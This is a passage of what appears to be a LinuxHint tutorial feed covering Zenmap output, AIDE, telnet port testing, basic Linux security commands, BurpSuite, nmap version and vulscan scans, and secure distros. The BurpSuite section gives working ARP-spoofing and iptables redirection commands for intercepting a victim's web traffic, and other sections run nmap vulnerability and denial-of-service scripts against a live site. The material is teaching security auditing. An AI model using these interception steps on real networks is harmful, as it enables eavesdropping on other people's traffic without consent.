| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx
|_http-title: Did not follow redirect to https://linuxhint.com/
161/tcp  filtered snmp
443/tcp  open         ssl/http        nginx
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.3.2
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx
|_http-title: Linux Hint – Exploring and Master Linux Ecosystem
|_http-trane-info: Problem with XML parsing of /evox/abou
| ssl-cert: Subject: commonName=linuxhint.com
| Subject Alternative Name: DNS:linuxhint.com, DNS:www.linuxhint.com
| Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-11-30T11:25:40
| Not valid after:  2020-02-28T11:25:40
| MD5:   56a6 1899 0a73 c79e 2db1 b407 53a6 79ec
|_SHA-1: a6b4 fcf9 67c2 4440 6f86 7aab 7c88 2608 674a 0303
1666/tcp filtered netview-aix-6
2000/tcp filtered cisco-sccp
2001/tcp filtered dc
2002/tcp filtered globe
2003/tcp filtered finger
2004/tcp filtered mailbox
2005/tcp filtered deslogin
2006/tcp filtered invokator
2007/tcp filtered dectalk</stron
2008/tcp filtered conf
2009/tcp filtered news
2010/tcp filtered search
6666/tcp filtered irc
6667/tcp filtered irc
6668/tcp filtered irc
6669/tcp filtered irc
9100/tcp filtered jetdirect

The following part of the report focuses on the OS detection:


Device type: general purpose|WAP
Running (JUST GUESSING): Linux 3.X|4.X (88%), Asus embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel
 cpe:/h:asus:rt-ac66u
Aggressive OS guesses: Linux 3.10 - 4.11 (88%), Linux 3.13 (88%), Linux 3.13 or 4.2 (88%), 
Linux 4.2 (88%), Linux 4.4 (88%), Linux 3.18 (87%), Linux 3.16 (86%), Linux 3.16 - 4.6 (86%),
Linux 3.12 (85%), Linux 3.2 - 4.9 (85%)

No exact OS matches for host (test conditions non-ideal).

The next part shows uptime, the total hops between you and the target and the final host detailing response time information on each hop.


Uptime guess: 145.540 days (since Fri Sep  6 07:11:33 2019)
Network Distance: 12 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:  zk153f8d-liquidwebsites.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   47.60 ms  192.168.0.1
2   48.39 ms  10.22.22.1
3   133.21 ms host-1-242-7-190.ipnext.net.ar (190.7.242.1)
4   41.48 ms  host-17-234-7-190.ipnext.net.ar (190.7.234.17)
5   42.99 ms  static.25.229.111.190.cps.com.ar (190.111.229.25)
6   168.06 ms mai-b1-link.telia.net (62.115.177.138)
7   186.50 ms level3-ic-319172-mai-b1.c.telia.net (213.248.84.81)
8   ...
9   168.40 ms 4.14.99.142
10  247.71 ms 209.59.157.114
11  217.57 ms lw-dc3-storm2.rtr.liquidweb.com (69.167.128.145)
12  217.88 ms 64.91.238.144

Finally you’ll be reported on post scan scripts execution:


NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results
at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.19 seconds
Raw packets sent: 2272 (104.076KB) | Rcvd: 2429 (138.601KB)

Now lets test the Intense scan plus UDP you can select from the Profile drop down menu:

With the Intense Scan plus UDP you’ll see the flags -sS, -sU, -T4, -A and -v.
Where as said before, -T refers to timing template, -A to OS, version detection, NSE and traceroute and:

-sS: enables SYN scan.

-sU: enables UDP scan.

An UDP scan may lead us to interesting discoveries in widely used services such as DNS, SNMP or DHCP.

To end this tutorial let’s see the Intense scan, all TCP ports.

This scan adds the flag -p to specify a ports range, in this case the port range is -p 1-65535, covering all existing TCP ports:

You can see the output including open and filtered ports on the Ports / Hosts tab:

I hope you found this tutorial on Zenmap useful, keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Setup And Configure Debian Linux Install Advanced Intrusion Detection Environment https://linuxhint.com/debian_linux_advanced_instrusion_detection_env/ Thu, 06 Feb 2020 18:29:25 +0000 https://linuxhint.com/?p=54732 Advanced Intrusion Detection Environment (AIDE) is another method to detect anomalies within the system. AIDE must not be confused with more widely known Intrusion Detection systems such as OSSEC or Snort which in order to detect attacks or security events analyzes the traffic looking for anomalous packets.

Contrary to these Intrusion Detection Systems (Usually referred as IDS), Advanced Intrusion Detection Environment (Known as AIDE) checks for files integrity by comparing the system files information and attributes with a database initially created.

First it creates the database of the healthy system to later compare the integrity using algorithms sha1, rmd160, tiger, crc32, sha256, sha512, whirlpool with optional integrations for gost, haval and cr32b. Of course AIDE supports remote monitoring.

Together with files information AIDE checks for files attributes such as file type, permissions, GID, UID, size, link name, block count, number of links, mtime, ctime and atime and attributes generated by XAttrs, SELinux, Posix ACL and Extended. With AIDE it is possible to specify files and directories to be excluded or included in monitoring tasks.

Setup and configure: Install Advanced Intrusion Detection Environment on Debian

To start by installing AIDE on Debian and derived Linux distributions run:

# apt install aide-common -y

After installing AIDE,  the first step to follow is to create a database on your health system to be contrasted with snapshots to verify files integrity.

To build the initial database run:

# sudo aideinit

Note: if you had a previous database AIDE will overwrite it (prior confirmation request), it is recommended to do a verification before proceeding.

This process may last long  minutes until showing the output you can see below

As you can see the database was generated at /var/lib/aide/aide.db.new, within the directory /var/lib/aide/ you’ll also see a file called aide.db:

# aide.wrapper -c /etc/aide/aide.conf --check

If the output is 0 AIDE did not find problems. If the flag –check is applied then the possible outputs meaning are:

1 = New files were found in the system.
2 = Files were removed from the system.
4 = Files in the system suffered changes.
14 = Error writing error.
15 = Invalid argument error.
16 = Unimplemented function error.
17 = Invalid configureline error.
18 = I/O error.
19 = Version mismatch error.

AIDE options and parameters include:

–init or -i: this option initializes the database, this is a mandatory execution prior to any check, checks won’t work if the database wasn’t initialized first.

–check or -C: when applied this option AIDE compares the system files with the database information. This is the default option applied when AIDE is executed without options.

–update or -u: this option is used to update a database.

–compare: this option is used to compare different databases, databases must be previously defined in the configuration file.

–config-check or -D: this option is useful to find errors in the configuration file, by adding this command AIDE will only read the configuration without continuing the process with files checking.

–config or -c = this parameter is useful to specify other configuration file than aide.conf.

–before or -B = add configuration parameters before reading the configuration file.

–after or -A = add configuration parameters after reading the configuration file.

–verbose or -V = with this command you can specify the verbosity level which can be defined between 0 and 255.

–report or -r = with this option you can send AIDE’s results report to other destinations, you can repeat this option instructing AIDE to send reports to different destinations.

You can get additional information on these and more AIDE commands and options in the man page.

AIDE Configuration File:

AIDE’s configuration is done on the configuration file located within /etc/aide.conf, from there you can define AIDE’s behavior, below you have some of the most popular options explained:

The lines in the configuration file include, among more functionalities:

database_out: here you can specify the new db location. While you can define several destinations when launching the command, in this configuration file you can set only one url.

database_new: source db url when comparing databases.

database_attrs: Checksum

database_add_metadata: add additional information as comments such as db time creation,etc.

verbose: here you can input a value between 0 and 255 to define the verbosity level.

report_url: url defining output location.

report_quiet: skips output if no differences were found.

gzip_dbout: here you can define if the db should be compressed (depends on zlib).

warn_dead_symlinks: define if dead symlinks should be reported or not.

grouped: group files which reportedly suffered changes.

More instructions on the configuration file options are available at https://linux.die.net/man/5/aide.conf.

I hope you found this article on Setup And Configure Debian Linux Install Advanced Intrusion Detection Environment useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Telnet to a Specific Port for Testing Purposes https://linuxhint.com/telnet_specific_port/ Thu, 06 Feb 2020 18:25:08 +0000 https://linuxhint.com/?p=54743 Telnet is both a protocol allowing us to access a remote device to control it and the program used to connect through this protocol. The Telnet protocol is the “cheap” version of ssh, unencrypted, vulnerable to sniffing and Man In the Middle attacks, by default the Telnet port must be closed.

The telnet program, which is not the Telnet protocol, can be useful to test port states which is the functionality this tutorial explains. The reason why this protocol is useful to connect to different protocols such as POP is both protocols support plain text (which is their main problem and why such services should not be used).

Checking ports before starting:

Before starting with telnet, let’s check with Nmap some ports on the sample target (linuxhint.com).

# nmap linuxhint.com

Getting started with Telnet to specific ports for testing purposes:

Once we learned about open ports, we can start launching tests, let’s try the port 22 (ssh), on the console write “telnet <target> <port>” as shown below:

# telnet linuxhint.com 22

As you can see in the example below the output says I’m connected to linuxhint.com, therefore the port is open.

Let’s try the same on the port 80 (http):

# telnet linuxhint.com 80

The output is similar with port 80, now let’s try the port 161 which according to Nmap is filtered:

# telnet linuxhint.com 161

As you see the filtered port didn’t allow the connection to be established returning a time out error.

Now let’s try Telnet against a closed (not filtered) port, for this example I will use the port 81. Since Nmap didn’t report on closed ports before proceeding I will confirm it is closed, by scanning the specific port using the -p flag:

# nmap -p 81 linuxhint.com

Once confirmed the port is closed, let’s test it with Telnet:

# telnet linuxhint.com 81

As you can see the connection wasn’t established and the error is different than with the filtered port showing “Connection refused”.

To close an established connection, you can press CTRL+] and you will see the prompt:

telnet>

Then type “quit” and press ENTER.

Under Linux you can easily write a little shell script to connect through telnet with different targets and ports.

Open nano and create a file called multipletelnet.sh with the following content inside:


#! /bin/bash
#The first uncommented line will connect to linuxhint.com through port $
telnet linuxhint.com 80
#The second uncommented line will connect to linux.lat through ssh.
telnet linux.lat 22
#The third uncommented line will connect to linuxhint.com through ssh
telnet linuxhint.com 22

Connections only start after the previous was closed, you can close the connection by passing any character, In the example above I passed “q”.

Yet, if you want to test many ports and targets simultaneously Telnet isn’t the best option, for which you have Nmap and similar tools

About Telnet:

As said before, Telnet is an unencrypted protocol vulnerable to sniffers, any attacker can intercept the communication between the client and the server in plain text accessing sensible information such as passwords.

The lack of authentication methods also allow possible attackers to modify the packages sent between two nodes.

Because of this Telnet was rapidly replaced by SSH (Secure Shell) which provides a variety of authentication methods and also encrypts the whole communication between nodes.

Bonus: testing specific ports for possible vulnerabilities with Nmap:

With Nmap we can go far more than with Telnet, we can learn the version of the program running behind the port and we can even test it for vulnerabilities.

Scanning a specific port to find vulnerabilities on the service:

The following example shows a scan against the port 80 of linuxhint.com calling Nmap NSE script vuln to test offensive scripts looking for vulnerabilities:

# nmap -v -p 80 --script vuln linuxhint.com

As you can see, since it is LinuxHint.com server no vulnerabilities were found.

It is possible to scan a specific port for a specific vulnerability; the following example shows how to scan a port using Nmap to find DOS vulnerabilities:

# nmap -v -p 80 --script dos linuxhint.com

As you can see Nmap found a possible vulnerability (it was a false positive in this case).

You can find a lot of high quality tutorials with different port scanning techniques at https://linuxhint.com/?s=scan+ports.

I hope you found this tutorial on Telnet to a specific port for testing purposes useful. Keep following LinuxHint for more tips and updates on Linux and networking ]]> List of essential Linux security commands https://linuxhint.com/list_essential_linux_security_commands/ Thu, 06 Feb 2020 18:20:22 +0000 https://linuxhint.com/?p=54767 This tutorial shows some of the most basic Linux commands oriented to security.

Using the command netstat to find open ports:

One of the most basic commands to monitor the state of your device is netstat which shows the open ports and established connections.

Below an example of the netstat with additional options output:

# netstat -anp

Where:
-a: shows the state for sockets.
-n: shows IP addresses instead of hots.
-p: shows the program establishing the conenction.

An output extract better look:

The first column shows the protocol, you can see both TCP and UDP are included, the first screenshot also shows UNIX sockets. If you are suspicious that something is wrong, checking ports is of course mandatory.

Setting basic rules with UFW:

LinuxHint has published great tutorials on UFW and Iptables, here I will focus on a restrictive policy firewall. It is recommended to keep a restrictive policy denying all incoming traffic unless you want it to be allowed.

To install UFW run:

# apt install ufw

To enable the firewall at startup run:

# sudo ufw enable

Then apply a default restrictive policy by running:

#  sudo ufw default deny incoming

You will need to manually open the ports you want to use by running:

# ufw allow <port>

Auditing yourself with nmap:

Nmap is, if not the best, one of the best security scanners in the market. It is the main tool used by sysadmins to audit their network security. If you are in a DMZ you can scan your external IP, you can also scan your router or your local host.

A very simple scan against your localhost would be:

As you see the output shows my port 25 and port 8084 are open.

Nmap has a lot of possibilities, including OS, Version detection, vulnerability scans, etc.
At LinuxHint we have published a lot of tutorials focused on Nmap and its different techniques. You can find them here.

The command chkrootkit to check your system for chrootkit infections:

Rootkits are probably the most dangerous threat to computers. The command chkrootkit

(check rootkit)  can help you to detect known rootkits.

To install chkrootkit run:

# apt install chkrootkit

Then run:

# sudo chkrootkit

Using the command top to check processes taking most of your resources:

To get a fast view on running resources you can use the command top, on the terminal run:

# top

The command iftop to monitor your network traffic:

Another great tool to monitor your traffic is iftop,

# sudo iftop  <interface>

In my case:

# sudo iftop wlp3s0

The command lsof (list open file) to check for files<>processes association:

Upon being suspicious something is wrong, the command lsof can list you the open processes and to which programs are they associated, on the console run:

# lsof

The who and w to know who is logged into your device:

Additionally, to know how to defend your system it is mandatory to know how to react before you are suspicious your system has been hacked. One of the first commands to run before such situation are w or who which will show what users are logged into your system and through what terminal. Let’s begin with the command w:

# w

Note: commands “w” and “who” may not show users logged from pseudo terminals like Xfce terminal or MATE terminal.

The column called USER displays the username, the screenshot above shows the only user logged is linuxhint, the column TTY shows the terminal (tty7), the third column FROM displays the user address, in this scenario there are not remote users logged in but if they were logged in you could see IP addresses there.  The LOGIN@ column specifies the time in which the user logged in, the column JCPU summarizes the minutes of process executed in the terminal or TTY. the PCPU displays the CPU used by the process listed in the last column WHAT.

While w equals to executing uptime, who and ps -a together another alternative, despite with less information is the command “who”:

# who

The command last to check the login activity:

Other way to supervise users’ activity is through the command “last” which allows to read the file wtmp which contains information on login access, login source, login time, with features to improve specific login events, to try it run:

Checking the login activity with the command last:

The command last reads the file wtmp to find information on login activity, you can print it by running:

# last

Checking your SELinux status and enable it if needed:

SELinux is restriction system which improves any Linux security, it comes by default on some Linux distributions, it is widely explained here on linuxhint.

You can check your SELinux status by running:

# sestatus

If you get a command not found error, you can install SELinux by running:

#   apt install selinux-basics selinux-policy-default -y

Then run:

# selinux-activate

Check any user activity using the command history:

At any time, you can check any user activity (if you are root) by using the command history logged as the user you want to monitor:

# history

The command history reads the file bash_history of each user. Of course, this file can be adulterated, and you as root can read this file directly without invoking the command history. Yet, if you want to monitor activity running is recommended.

I hope you found this article on essential Linux security commands useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
BurpSuite Tutorial for Beginners https://linuxhint.com/burpsuite_tutorial_beginners/ Wed, 05 Feb 2020 12:20:20 +0000 https://linuxhint.com/?p=54620 BurpSuite is a collection of tools to carry out pen testing or security auditing.  This tutorial focuses on the Community version, the free one, which features Proxy, Intruder, Repeater, Sequencer, Comparer, Extender and Decoder tools.

This tutorial shows how to install BurpSuite on Debian, how to setup your browser (in this tutorial I only show how to setup it on Firefox) and SSL certificate and how to capture packets without previous proxy configuration on the target by combining it with ArpSpoof and configuring the Invisible Proxy to listen.

To begin installing BurpSuite visit and select the Get Community option (the third one) to get BurpSuite for free.

In the next screen click on “Download the latest version” orange button to continue.

Click on the green Download button.

Save the .sh script and give it execution permissions by running:

# chmod +x <package.sh>

In this case for the current version at this date I run:

# chmod +x burpsuite_community_linux_v2020_1.sh

Once the execution rights were given execute the script by running:

# ./burpsuite_community_linux_v2020_1.sh

A GUI installer will prompt, press on “Next” to continue.

Leave the default installation directory (/opt/BurpSuiteCommunity) unless you need a different location and press Next to continue.

Seek “Create Symlink” selected and leave the default directory and press Next.

The installation process will start:

Once the process ends click on Finish.

From your X-Window manager apps menu select BurpSuite, in my case it was located on the category “Other”.

Decide if you wish to share your BurpSuite experience or not, click I Decline, or I Accept to continue.

Leave Temporary Project and press Next.

Leave Use Burp defaults and press Start Burp to launch the program.

You’ll see BurpSuite main screen:

Before proceeding, open firefox and open http://burp.

A screen similar to the shown below will show up, on the upper right corner click on CA Certificate.

Download and save the certificate.

On the Firefox menu click on Preferences, then click on Privacy and Security and scroll down until you find the Certificates section, then click on View Certificates as shown below:

Click on Import:

Select the certificate you got previously and press Open:

Click on “Trust this CA to identify websites.” and press OK.

Now, still on the Firefox Preferences menu click on General in the menu located in the left side and scroll down until reaching Network Settings, then click on Settings.

Select Manual Proxy Configuration and in the HTTP Proxy field set the IP 127.0.0.1, checkmark the “Use this proxy server for all protocols”, then click OK.

Now BurpSuite is ready to show how it can intercept traffic through it when defined as proxy. On BurpSuite click on the Proxy tab and then on the Intercept sub tab making sure intercept is on and visit any website from your firefox browser.

The request between the browser and the visited website will go through Burpsuite, allowing you to modify the packets as in a Man in the Middle attack.

The example above is the classical Proxy feature show for beginners. Yet, you don’t always can configure the target’s proxy, if you did, a keylogger would be more helpful than a Man In the Middle attack.

Now we will use DNS and the Invisible Proxy feature to capture traffic from a system we can’t configure the proxy on.

To begin run Arpspoof (on Debian and based Linux systems you can install with through apt install dsniff)Once installed dsniff with arpspoof, to capture packets from the target to the router on the console run:

# sudo arpspoof -i <Interface-Device> -t <Target-IP> <Router-IP>

Then to capture packets from the router to the target run in a second terminal:

# sudo arpspoof -i <Interface-Device> -t  <Router-IP> <Target-IP>

To prevent blocking the victim enable IP forwarding:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect all traffic to port 80 and 443 to your device using iptables by running the commands below:

# sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination
192.168.43.38
# sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination
192.168.43.38

Run BurpSuite as root, otherwise some steps like enabling new proxies on specific ports won’t work:

# java -jar -Xmx4g /opt/BurpSuiteCommunity/burpsuite_community.jar

If the following warning appears press OK to continue.

Once BurpSuite is open, click on Proxy>Options and click on the Add button.

Select 80 and on Specific address select your Local network IP address:

Then click on Request handling tab, checkmark Support Invisible proxying (enable only if needed) and press OK.

Repeat the steps above now with port 443, click on Add.

Set the port 443 and again select your local network IP address.

Click on Request Handling, checkmark support for invisible proxying and press OK.

Mark all proxies as running and as invisible.

Now from the target device visit a website, the Intercept tab will show the capture:

As you can see you managed to capture packets without previous proxy configuration on the target’s browser.

I hope you found this tutorial on BurpSuite useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Nmap Version Scan, determining the version and available services https://linuxhint.com/nmap_version_scan/ Wed, 05 Feb 2020 12:13:49 +0000 https://linuxhint.com/?p=54690 The action of collecting more information as possible about a target is usually called “footprinting” by IT specialists.While Nmap default scans ports looking for available services it is possible to force the scan to try to detect software versions running on the target increasing the footprinting accuracy.

The reasons why it is so important to detect services and software version on the target device is because some services share the same ports, therefore in order to discriminate services, detecting the software running behind the port may become critical.

Yet, the main reason most sysadmins will run a version scan is to detect security holes or vulnerabilities belonging to outdated or specific software versions.

A regular Nmap scan can reveal opened ports, by default it won’t show you services behind it, you can see a 80 port opened, yet you may need to know if Apache, Nginx or IIS is listening.

By adding version detection NSE (Nmap Scripting Engine) can also contrast the identified software with vulnerabilities databases (see “How to use Vuls”).

How Nmap services and version detection works?

In order to detect services Nmap uses the database called nmap-services including possible services per port, the list can be found at https://svn.nmap.org/nmap/nmap-services, if you have a customized port configuration you can edit the file located at /usr/share/nmap/nmap-services. To enable service detection the flag -A is used.

To detect software versions Nmap has another database called nmap-service-probes which includes probes for querying and match expressions to identify responses.

Both databases help Nmap first to detect the service behind the port such as ssh or http. Second, Nmap will try to find the software providing the service (such as OpenSSH for ssh or Nginx or Apache for http) and the specific version number.

In order to increase version detection accuracy, this specific scan integrates NSE (Nmap Scripting Engine) to launch scripts against suspected services to confirm or discard detections.

You can always regulate the intensity of a scan as will be explained below despite it will be only useful against uncommon services on targets.

Getting started with Nmap Services and Version Detection:

To install Nmap on Debian and based Linux distributions run:

# apt install nmap -y

Before starting lets run a regular Nmap scan by executing:

# nmap linuxhint.com

You can see open and filtered ports are listed, now lets run a version scan by executing:

# nmap -sV linuxhint.com

You can see in the output above this time Nmap detected OpenSSH 6.6.1p1 behind port 22, Postfix behind port 25 and Nginx behind ports 80 and 443. In some cases, Nmap cannot distinguish filtered ports, in such cases Nmap will mark them as filtered, yet if instructed it will continue probes against these ports.

It is possible to determine que grade of intensity Nmap will use to detect software versions, by default the level 7 and the possible range is from 0 to 9. This feature will only show results if uncommon services are running on the target, there will not be differences in servers with widely used services. The following example shows a version scan with minimal intensity:

#  nmap -sV --version-intensity 0 linuxhint.com

To run the most aggressive version detection scan, replace the 0 for 9:

# nmap -sV --version-intensity 9 linuxhint.com

The level 9 can be also executed as:

# nmap -sV --version-all nic.ar

For a low intensity version detection (2) you can use:

#  nmap -sV --version-light  nic.ar

You can instruct Nmap to show the whole process by adding the –version-trace option:

# nmap -sV  --version-trace 192.168.43.1

Now, let’s use the flag -A which also enables version detection, additionally to OS, traceroute and NSE:

# nmap -A 192.168.0.1

As you can see after the scan NSE post scan as launched detecting possible vulnerabilities for the exposed Bind version.

The device type and OS were successfully detected as phone and Android and a traceroute was also executed (the Android mobile is working as hotspot).

While in order to detect services NSE is integrated to allow a better accuracy, a specific OS detection scan can be launched with the -O flag as in the following example:

# nmap -O 192.168.43.1

As you see the result was pretty similar without NSE, which is by default integrated to version probes.

As you could see, with Nmap and few commands you’ll be able to learn relevant information on software running on targets, if the flag -A is enabled Nmap will test results trying to find security holes for the specified service versions.

I hope you found this tutorial on Nmap Version Scan useful, there are a lot of additional high quality content on Nmap at https://linuxhint.com/?s=nmap.

Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
Most secure Linux distros https://linuxhint.com/most_secure_linux_distros/ Tue, 04 Feb 2020 18:43:54 +0000 https://linuxhint.com/?p=54563 This article focuses on some of the most secure Linux distros including QubeOS, Tails, Alpine Linux, Whonix, IprediaOS and a shared review for offensive security distributions including Kali Linux, Black Arch and Parrot OS for being the best options to pentest yourself.

Some of the Linux distributions mentioned below are optimized to prevent hacker attacks while others fit better if you want to prevent forensics against your devices.

Security offensive Linux distributions are also a good option when looking for safe OS and some were included in this list.

Qubes OS

Qubes OS uses Bare Metal, hypervisor type 1, Xen. It offers isolated virtualization of systems (domains) based on different Linux distributions and even Windows. It is free and open source and leads the market as the most, or among the most secure solutions featuring Linux (Operating Systems like OpenBSD are excluded from this article).

Qubes OS divides or isolates different domains (virtual machines) for different purposes each, in case one of the virtualizations get hacked the rest remain safe. Each domain, Qube, compartment or virtualized system has a different security level depending on the activity the user develops, for example, you can have a virtual machine, compartment or Qube to manage your bitcoins wallet, a different Qube for work, a different one for undefined tasks, etc. QubeOS shows all Qubes or compartments in a single screen each Qube is identified by a color associated with the security level.

Qubes OS is a free and open-source security-oriented operating system meant for single-user desktop computing.

And Qubes OS has a referral officially from Edward Snowden. Snowden tweeted: “If you’re serious about security, @QubesOS is the best OS available today. It’s what I use, and free. Nobody does VM isolation better.”  You can get QubeOS  for free at https://www.qubes-os.org/.

Tails (The Amnesic Incognito Live System):

Tails is a live Debian based Linux distribution considered among the most secure distributions together with the previously mentioned QubeOS.

Tails can be considered an anti-forensic Linux distribution which doesn’t leave traces of activity, in order to achieve this Tails forces all network traffic through the Tor anonymous network.

Among the tools included in Tails you can find Tor for anonymous browsing, pidgin for encrypted communication (messengers), Claws Mail for encrypted emails, Liferea, Aircrack-ng to audit wireless network connections, I2P for safe connections, Electrum to manage bitcoins, LUKS to encrypt devices, GnuPG to encrypt files, Monkeysign, PWGen, KeepPassX to manage passwords, MAT, GTkHash for checksums, Keyringer  and Paperkey to save PGP keys and more.

To prevent forensics, even when used as live cd, Tails overwrites memory to remove all traces of activity recoverable by forensic tools. Optionally Tails allows you to install it in a persistent mode in a encrypted storage device.

Tails, based on Debian, was formerly known as Incognito, a widely used Gentoo Linux based distribution used to browse anonymously.

You can download Tails for free from its official website at https://tails.boum.org/.

Alpine Linux

Alpine Linux aims to be a small, simple and secure Linux distribution.  Having these 3 main features, it can be installed in storage devices with as little as 130 mb of capability. Alpine Linux features its own packages manager (APK) and additional software from the repositories.  All software executed by the user under Alpine Linux uses PIE allowing executable to run on random locations in the memory. Alpine Linux can be obtained for free from its official website at https://alpinelinux.org/.

IprediaOS

IprediaOS is a fast and secure OS based on Fedora Linux. It provides an anonymous environment for browsing, mailing, chatting and sharing files. IpreadiOS features Robert Bit Torrent ready to share files anonymously through I2P, Wireshark, the SELinux bowser, Xchat to communicate anonymously through I2P which also includes an anonymous mail service (Susimail).

IprediaOS can be downloaded for free from https://www.ipredia.org/.

Whonix

Whonix is another secure Linux solution based on Debian. Whonix is integrated by 2 different virtualized devices, the desktop where the user works and a gateway.  The desktop environment can’t reach the network without passing through the gateway which intermediates between the desktop and the Tor network.  Whonix can run on VirtualBox, KVM or QubeOS mentioned previously.

Contrary to QubeOS, Whonix remembers Tor nodes preventing new attackers from impersonating nodes to carry out MiM attacks. Whonix was designed to provide security and anonymize users, in fact the project has the tagline: “Anonymize Everything You Do Online”.  it can be downloaded for free from its official website at https://www.whonix.org/.

Safe offensive Linux distributions:

Because this article focuses on secure Linux distributions, distributions oriented to hacking must be included for a variety of reasons.

Hacking distributions like Kali Linux, Black Arch, Parrot OS, etc. include formidable tools to test your own environment, you can always run attacks against yourself to audit your security. All the distributions mentioned above included in this category bring tools to audit your local network such as Aircrack, Reaver, Wireshark, Nmap and additional tools capable to test your own security.

Kali Linux can be downloaded from its official website at: https://www.kali.org/
Parrot OS Linux can be downloaded from its official website at: https://parrotlinux.org/
Black Arch Linux can be downloaded from its official website at: https://blackarch.org/

All of them are also available as live distributions to be used upon need.

I hope you found this article on secure Linux distros useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to use nmap vulscan https://linuxhint.com/nmap_vulscan/ Tue, 04 Feb 2020 18:37:04 +0000 https://linuxhint.com/?p=54574 Vulscan is a Nmap Scripting Engine script which helps Nmap to find vulnerabilities on targets based on services and version detections to estimate vulnerabilities depending on the software listening on the target.

This tutorial shows how to install and carry out a scan using vuls script.  Vuls results tend to show long list of possible vulnerabilities, one per script it will run against each service detected in the target.

To begin installing Vulscan using git, run:

# git clone https://github.com/scipag/vulscan scipag_vulscan

Note: you can install git by running apt install git

Then run:

# ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan

To begin with a minimal scan run:

# nmap -sV --script=vulscan/vulscan.nse linuxhint.com

Analyzing the Vulscan output:

The first lines will show the characteristics of the scan, such as Nmap version, timing, and previous info on the target such as its state.


# nmap -sV --script=vulscan/vulscan.nse linuxhint.com
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-29 20:14 -03
Nmap scan report for linuxhint.com (64.91.238.144)
Host is up (0.23s latency).

Then it will start reporting on available services, contrasting them with vulnerabilities of the Vulscan database, as you can see below, after detecting that the SSH port is available Vulscan starts running scripts to check for vulnerabilities for this specific service:

IMPORTANT NOTE:  to keep this tutorial readable 90% of executed scripts for each service were removed, all you need to know is all possible vulnerabilities for a specific service existing in the database will be checked.


Not shown: 978 closed ports
PORT           STATE   SERVICE      VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| vulscan: VulDB - https://vuldb.com:
| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate
weak authentication
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20,
6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, 
when old-style password authentication is enabled, allows remote attackers to bypass authentication
 via a crafted session involving entry of blank passwords, as demonstrated by a root login session 
from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.

| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise
Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function
in the OpenSSH codebase, which allows local users to obtain sensitive information from process
memory or possibly gain privileges via crafted use of an application that relies on this module,
as demonstrated by su and sudo.

| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit
between establishing a TCP connection and completing a login, which makes it easier for remote
attackers to cause a denial of service (connection-slot exhaustion) by periodically making many
new TCP connections.

| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack
forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is
listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and
sniffing a cookie sent by Emacs.

Below you see the port 25 is filtered, probably by a firewall or Vuls is unable to determine its state with security. It then checks for the port 80 finding it open and detecting Nginx behind it and again, like with OpenSSH detected previously, Vuls will run tests to confirm or discard all vulnerabilities contained in the database.

IMPORTANT NOTE:  to keep this tutorial readable 90% of executed scripts for each service were removed, all you need to know is all possible vulnerabilities for a specific service existing in the database will be checked.


25/tcp   filtered smtp
80/tcp   open          http              nginx
|_http-server-header: nginx
| vulscan: VulDB - https://vuldb.com:
| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php
Code Execution
| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption

Finally, Nmap will show all filtered ports found:


|_
1666/tcp filtered netview-aix-6
2000/tcp filtered cisco-sccp
